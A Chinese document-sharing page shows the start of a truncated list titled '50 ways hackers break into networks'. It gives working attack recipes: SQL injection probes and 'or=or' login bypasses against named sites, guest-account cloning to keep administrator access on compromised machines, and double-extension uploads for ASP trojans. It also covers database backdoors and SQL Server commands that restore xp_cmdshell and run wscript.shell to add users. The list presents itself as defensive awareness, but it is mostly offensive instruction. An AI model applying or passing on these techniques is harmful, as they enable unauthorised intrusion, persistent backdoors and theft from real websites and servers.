- 1、本文档共13页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 5、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 6、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 7、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 8、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
黑客入侵网络的50种方法
黑客入侵网络的50种方法
黑客入侵网络的50种方法
现在网上的攻击事件越来越多,黑客都是通过什么方法来攻击我们的呢?下面我们给大家总结了黑客入侵网络的五十种方法,让大家做到有备无患。
1.网宽网络有限公司制作的网站基本都有注入漏洞 搜索网宽网络
2.搜索栏里输入
关键字%and 1=1 and %=
关键字%and 1=2 and %=
比较不同处 可以作为注入的特征字符
3.登陆框用户名和密码输入or=or 漏洞很老但是现在很是遍地都是
4.我们先到底下搜索一下co net mib ver 1.0
密码帐号都是 or=or
5.挂马代码
6./24小时挂qq工具
7.开启regedt32的sam的管理员权限 检查hkey_local_machine\sam\sam\和hkey_local_machine\sam\sam\下的管理员和guest的f键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡,这方法是简单克隆,
net localgroup administrators还是可以看出guest是管理员来
7.只要敢想,新浪也可入侵 注入点
/plaza/event/new/crnt_event_view.asp?event_id=59
微软官方网站注入点
/library/toolbar/3.0/search.aspx?view=en-uscharset=iso-8859-1qu=
8.ms05016攻击工具用法 mshta.exe test.hta 文件名.后缀名 可以绑上qq大盗木马
9.有sa权限sqlserver数据库、并且能sql注入支持fso+asp的服务器
sql注入后,如何上传木马,
文章地址 /0601.htm
10.qq强制聊天代码
/msgrd?v=1uin=对方的qq号site=ioshenmuemenu=yes
使用方法:把代码中的红色的“********”星号换成你想与其聊天的qq号后复 制到浏览器的地址栏处即可。无论他是否你的好友,你无须加他为好友就能给 他发qq消息。
11. mybbs论坛cookie欺骗 后台备份马
12.软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂qq等
用法: 安装: instsrv.exe 服务名称 路径
卸载: instsrv.exe 服务名称 remove
13.以动网为例数据库查找dv_log,在上面的查询的字段名里选l_content后面的关键字填上password2,找到的username2=%b7%e7%a4%ce%b0%d7%d2%c2password2sername1=%b7%e7%a4%ce%b0%d7%d2%c2submit=%cc%ed+%bc%d3 password2是他的登陆密码
14.搜索的技巧 inurl:网址
15.启航工作室wms 5.0网站程序漏洞
在baidu 搜索powered by: sailingstudio website manage system 5.0 (sp1)
利用动画看/626824.html
16.很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是asp结尾,所以木马不会变~
17.天意商务系统网上依然有 有漏洞 网站具体的样式/
工具下载
地址栏里,填上天意商务系统的网址就可以了,注意一定要是主页面
18.sql注入时工具internet选项高级里找到显示友好的错误信息勾去掉
不能注入时要第一时间想到%5c暴库
19.这个dbinbd.asp文件插入后门的功能适用于文件名为.asp的所有access数据库不是动网论坛也一样可以使用的,后门隐蔽,几乎发现不了
工具使用方法动画和所有文件
/bbs/printpage.asp?boardid=2id=811
20.缺少xp_cmdshell时
尝试恢复exec sp_addextendedproc xp_cmdshell,@dllname=xplog70.dll
假如恢复不成功,可以尝试直接加用户(针对开3389的)
declare @o int
exec sp_oacreate wscript.shell,@o out
exec sp_oame
您可能关注的文档
- 香精基础知识4-乳化香精生产理论.doc
- 香蕉科学施肥技术.doc
- 香辣牛肉酱.doc
- 馨鸳个人资料简介.doc
- 马云“夺宝”博弈阿里控制权管理.doc
- 香薰化妆品“兰若”品牌入市市场营销策划方案.doc
- 马克思CMS电影站伪原创单词MAXCMS4.0.doc
- 马克思主义哲学解释事物的两面性.doc
- 马克思主义课教实效性.doc
- 马克思的唯物史观.doc
- 2025年山西体育职业学院单招(语文)测试题库及答案一套.docx
- 2025年山西省晋城市选调生考试(公共基础知识)综合能力题库一套.docx
- 2025年山东省临沂市单招(语文)测试模拟题库附答案.docx
- 2025年山东省德州市单招(语文)测试模拟题库及答案1套.docx
- 2025年山东省青岛市事业单位招聘考试(职业能力倾向测验)题库及参考答案.docx
- 2025年山东省滨州地区单招语文测试模拟题库及参考答案一套.docx
- 2025年山西省吕梁市事业单位招聘考试(职业能力倾向测验)题库必考题.docx
- 2025年南京城市职业学院单招职业技能考试题库完整.docx
- 2025年山西省财政税务专科学校单招语文测试模拟题库1套.docx
- 2025年山东省济南市行政职业能力测验模拟试题1套.docx
最近下载
- 储能电站项目可行性研究报告.docx
- 2024重庆公共运输职业学院招聘7人笔试备考题库及答案解析.docx VIP
- 华为IPD流程管理体系L1-L5最佳实践及落地实施.pptx VIP
- 铁路内燃机车司机高级技师理论题库(含答案).docx VIP
- 2026届高三语文开学第一课.pptx VIP
- 最新:脑卒中后吞咽障碍患者进食护理——2023中华护理学会团体标准课件.pptx VIP
- 2025重庆公共运输职业学院招聘13人笔试备考试题及答案解析.docx VIP
- 动词过去式不规则变化.doc VIP
- “十八项医疗质量安全核心制度”知识竞赛.docx VIP
- 2024重庆公共运输职业学院招聘1人笔试备考试题及答案解析.docx VIP
文档评论(0)